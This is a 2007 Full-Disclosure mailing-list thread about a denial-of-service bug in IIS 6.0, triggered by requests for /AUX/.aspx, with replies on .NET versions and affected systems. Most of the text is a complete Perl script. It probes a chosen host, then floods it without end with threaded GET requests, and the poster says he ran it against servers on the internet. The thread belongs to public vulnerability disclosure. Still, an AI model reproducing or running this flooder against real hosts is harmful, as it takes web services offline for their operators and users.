MacOS 10.2.8 also appears to be invulnerable to this. When I attempt to exploit the bug on a default install, I get 'connection refused' error.
Joey On Tue, 22 May 2007 11:22:51 -0400 kingcope <[EMAIL PROTECTED]> wrote: >Hello Stan, > >This is a good question. When I tested this on the latest >Windows Server 2007 with IIS/6.0 locally there was nothing >Like a DoS. On different Windows Servers in the wild the effect >was >That the servers did not respond for about 5 minutes after sending >The packets for ~20 seconds in many cases (also 5.0). Running the >script for >several minutes gave me an HTTPException on /. Perhaps this may be >a >configuration issue? > > >Best Regards, > >kcope > >-----Original Message----- >From: Stan Bubrouski [mailto:[EMAIL PROTECTED] >Sent: Tuesday, May 22, 2007 5:07 PM >To: kingcope >Cc: [email protected] >Subject: Re: [Full-disclosure] Question Regarding IIS 6.0 / Is >this a DoS??? > >What version of the .NET framework is running on the server? >1.1.x, >2.0.x, or 3.0.x? > >-sb > >On 5/22/07, kingcope <[EMAIL PROTECTED]> wrote: >> Hello List, >> >> Recently I saw a small bug in IIS 6.0 when requesting a special >path. >> When I request /AUX/.aspx the server takes a bit longer to >respond as >> Normally. So I did write an automated script to see what happens >if >> I request this file several times at once. The result is that >some servers >> On the internet get quite instable, some do not. On some servers >after I >> Stop the attack I get an exception that the Server is too >busy/Unhandled >> Exception on the wwwroot (/) path. >> Can you/the list confirm that? >> >> Here is a lame testing script for this stuff: >> >> >> >> >> >> #When sending multiple parallel GET requests to a IIS 6.0 server >requesting >> #/AUX/.aspx the server gets instable and non responsive. This >happens only >> #to servers which respond a runtime error >(System.Web.HttpException) >> #and take two or more seconds to respond to the /AUX/.aspx GET >request. >> # >> # >> #signed, >> #Kingcope [EMAIL PROTECTED] >> >################################################################### >####### >> >###**************************************************************** >******* >> ### >> ### >> ### >> ### Lame Internet Information Server 6.0 Denial Of Service >(nonpermanent) >> ### by Kingcope, May/2007 >> ### Better run this from a Linux system >> >################################################################### >####### >> >> use IO::Socket; >> use threads; >> >> if ($ARGV[0] eq "") { exit; } >> my $host = $ARGV[0]; >> >> $|=1; >> >> sub sendit { >> $sock = IO::Socket::INET->new(PeerAddr => $host, >> PeerPort => 'http(80)', >> Proto => 'tcp'); >> >> print $sock "GET /AUX/.aspx HTTP/1.1\r\nHost: >> $host\r\nConnection:close\r\n\r\n"; >> } >> >> $sock = IO::Socket::INET->new(PeerAddr => $host, >> PeerPort => 'http(80)', >> Proto => 'tcp'); >> >> print $sock "GET /AUX/.aspx HTTP/1.1\r\nHost: >> $host\r\nConnection:close\r\n\r\n"; >> >> $k=0; >> while (<$sock>) { >> if (($_ =~ /Runtime\sError/) || ($_ =~ /HttpException/)) >{ >> $k=1; >> last; >> } >> } >> >> if ($k==0) { >> print "Server does not seem vulnerable to this >attack.\n"; >> exit; >> } >> >> print "ATTACK!\n"; >> >> while(1){ >> >> for (my $i=0;$i<=100;$i++) { >> $thr = threads->new(\&sendit); >> print "\r\r\r$i/100 "; >> } >> >> foreach $thr (threads->list) { >> $thr->join; >> } >> } >> >> >> _______________________________________________ >> Full-Disclosure - We believe in it. >> Charter: http://lists.grok.org.uk/full-disclosure-charter.html >> Hosted and sponsored by Secunia - http://secunia.com/ >> > >_______________________________________________ >Full-Disclosure - We believe in it. >Charter: http://lists.grok.org.uk/full-disclosure-charter.html >Hosted and sponsored by Secunia - http://secunia.com/ _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
